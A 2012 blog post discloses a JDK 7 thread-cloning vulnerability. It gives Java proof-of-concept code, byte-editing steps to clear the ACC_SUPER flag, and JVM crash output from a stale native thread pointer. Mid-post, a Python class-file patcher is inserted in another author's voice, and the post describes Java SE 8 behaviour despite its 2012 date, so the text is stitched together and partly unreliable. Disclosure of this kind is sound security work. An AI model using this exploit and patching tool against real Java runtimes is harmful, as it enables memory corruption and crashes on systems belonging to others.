Thursday, November 01, 2012

JDK 7 Thread Cloning Vulnerability

This blog entry was originally posted on June 23, 2011, but was deleted as Oracle asked me to take it down while they investigate. After more than a year, the issue still has not been addressed, so I notified Oracle that I wanted to repost the blog entry and received no response. -- Jeroen

I warned on the mailing list when this came up, but apparently was ignored, so maybe a blog post will help.

In one of last year's updates of JDK 6 the cloning vulnerability was fixed in a hackish, but clever and safe way. Now in JDK 7 they try to fix it by overriding Object.clone() in Thread with a version that simply throws CloneNotSupportedException. The problem is that in Java (and in .NET) overriding a method is not a safe way to make the base class method unavailable: an override only redirects normal virtual dispatch, while bytecode can still name the base class method directly.

The (still) not so well known ACC_SUPER flag controls how invokespecial resolves a call to a superclass method. When the flag is set (javac always sets it), the JVM starts the lookup at the calling class's direct superclass, so Thread.clone() is found first. When it is not set, the JVM calls the method of exactly the class named in the instruction, so a call compiled as invokespecial java/lang/Object.clone skips Thread.clone() and reaches Object.clone() from any Thread subclass whose class file has ACC_SUPER cleared. Note that this only works on the HotSpot of this era: from Java SE 8 on, the JVM treats ACC_SUPER as set in every class file regardless of the actual bit, so the trick is specific to JDK 7 and earlier.

Here's an example. Object.clone() copies every field of the Thread object, including the private one holding the pointer to the native thread, so the clone t refers to the same native thread as c1. Once c1 has been stopped and joined, that native thread is gone, and t.stop() hands the VM a stale pointer:

class Clone extends Thread implements Cloneable {
  // With ACC_SUPER cleared on this class, the invokespecial emitted for
  // super.clone() reaches Object.clone() directly instead of Thread.clone().
  public Object clone() {
    try { return super.clone(); }
    catch (CloneNotSupportedException e) { throw new Error(e); }
  }
}

class Demo {
  public static void main(String[] args) throws Throwable {
    Clone c1 = new Clone() {
      public void run() {
        for (;;) {
        }
      }
    };
    c1.start();
    Thread t = (Thread)c1.clone(); // second Thread object for the same running native thread
    c1.stop();
    c1.join();                     // the native thread has now exited
    System.gc();
    t.stop();                      // acts on the stale native thread pointer copied into t
  }
}

Note that after you compile this with JDK 6 you'll need to edit Clone.class to clear the ACC_SUPER flag. JDK 6 matters because its Thread has no clone() method, so javac emits the super call as invokespecial java/lang/Object.clone, which is exactly the reference the trick needs; javac on JDK 7 sees Thread.clone() and emits java/lang/Thread.clone, which lands on the throwing override no matter what the flag says. The flag lives in the u2 access_flags field that immediately follows the constant pool; for the package-private class Clone that field is 00 20, so use a hex editor to replace that 20 (hex) with 00 (that byte only, not any other 20 in the file) or download a copy here.
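Both the ACC_SUPER description above and the hex-editor step come down to one u2 field whose position depends on the size of the constant pool, which is easy to get wrong by hand. As an added example (my code, not the post's or Oracle's), here is a small Python 3 script that walks the constant pool to find access_flags, reports whether ACC_SUPER is set, and clears it. The embedded sample class is a constructed stand-in for javac's Clone.class (a member-less class Clone extends java.lang.Thread), not the author's download; the file names in the usage line are hypothetical. The script only touches the flag; the call site still has to reference java/lang/Object.clone as described above.

```python
import struct
import sys

ACC_SUPER = 0x0020  # class access_flags bit that changes invokespecial lookup

# Fixed payload sizes (bytes after the tag) for every constant pool tag except
# CONSTANT_Utf8 (tag 1), whose payload is a u2 length followed by that many bytes.
_CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
             12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def parse_class(data):
    """Walk the constant pool and return
    (offset_of_access_flags, access_flags, this_class_name, super_class_name)."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    cp_count = struct.unpack_from(">H", data, 8)[0]
    cp = [None] * cp_count          # index 0 is unused, as in the JVM spec
    pos, i = 10, 1
    while i < cp_count:
        tag = data[pos]
        if tag == 1:                # CONSTANT_Utf8
            length = struct.unpack_from(">H", data, pos + 1)[0]
            cp[i] = data[pos + 3:pos + 3 + length].decode("utf-8", "replace")
            pos += 3 + length
        elif tag == 7:              # CONSTANT_Class: u2 index of a Utf8 entry
            cp[i] = struct.unpack_from(">H", data, pos + 1)[0]
            pos += 3
        elif tag in _CP_SIZES:
            pos += 1 + _CP_SIZES[tag]
            if tag in (5, 6):       # Long and Double occupy two slots
                i += 1
        else:
            raise ValueError("unknown constant pool tag %d at offset %d" % (tag, pos))
        i += 1
    # access_flags, this_class and super_class immediately follow the pool
    access_flags, this_idx, super_idx = struct.unpack_from(">HHH", data, pos)
    this_name = cp[cp[this_idx]]
    super_name = cp[cp[super_idx]] if super_idx else None  # 0 only for java/lang/Object
    return pos, access_flags, this_name, super_name


def has_acc_super(data):
    return bool(parse_class(data)[1] & ACC_SUPER)


def clear_acc_super(data):
    """Return a copy of the class file with ACC_SUPER cleared in the class
    access_flags; only that u2 changes, the rest stays byte-identical."""
    offset, flags, _, _ = parse_class(data)
    return data[:offset] + struct.pack(">H", flags & ~ACC_SUPER) + data[offset + 2:]


def build_sample_class(flags=ACC_SUPER):
    """Constructed stand-in for javac output: a member-less
    `class Clone extends java.lang.Thread`, class file version 50 (Java 6)."""
    def utf8(s):
        b = s.encode("utf-8")
        return b"\x01" + struct.pack(">H", len(b)) + b
    pool = (b"\x07\x00\x02" + utf8("Clone") +             # #1 Class -> #2 Utf8
            b"\x07\x00\x04" + utf8("java/lang/Thread"))   # #3 Class -> #4 Utf8
    return (b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, 50)
            + struct.pack(">H", 5) + pool                 # constant_pool_count = entries + 1
            + struct.pack(">HHH", flags, 1, 3)            # access_flags, this_class, super_class
            + struct.pack(">HHHH", 0, 0, 0, 0))           # no interfaces/fields/methods/attributes


if __name__ == "__main__":
    # usage: python patch_acc_super.py Clone.class Clone.patched.class (hypothetical names)
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            original = f.read()
    else:
        original = build_sample_class()
    offset, flags, this_name, super_name = parse_class(original)
    print("%s extends %s: access_flags=0x%04x at offset %d, ACC_SUPER %s"
          % (this_name, super_name, flags, offset,
             "set" if flags & ACC_SUPER else "NOT set"))
    if len(sys.argv) == 3:
        with open(sys.argv[2], "wb") as f:
            f.write(clear_acc_super(original))
```

Run without arguments it parses the constructed sample and reports the flag at offset 43; with two file names it reads the first class file and writes a patched copy to the second. The same parse_class walk is what lets you confirm, after patching, that the only changed bytes are the two of access_flags.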

Now run it:

C:\j>\jdk1.7-b145\bin\java Demo
#
# A fatal error has been detected by the Java Runtime Environment:
#
# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x000000006cd5af54, pid=3708, tid=10460
#
# JRE version: 7.0-b145
# Java VM: Java HotSpot(TM) 64-Bit Server VM (21.0-b15 mixed mode windows-amd64 compressed oops)
# Problematic frame:
# V [jvm.dll+0x1caf54]
#
# Failed to write core dump. Minidumps are not enabled by default on client versions of Windows
#
# An error report file with more information is saved as:
# C:\j\hs_err_pid3708.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.sun.com/bugreport/crash.jsp
#

11/1/2012 4:11:20 PM (W. Europe Standard Time, UTC+01:00)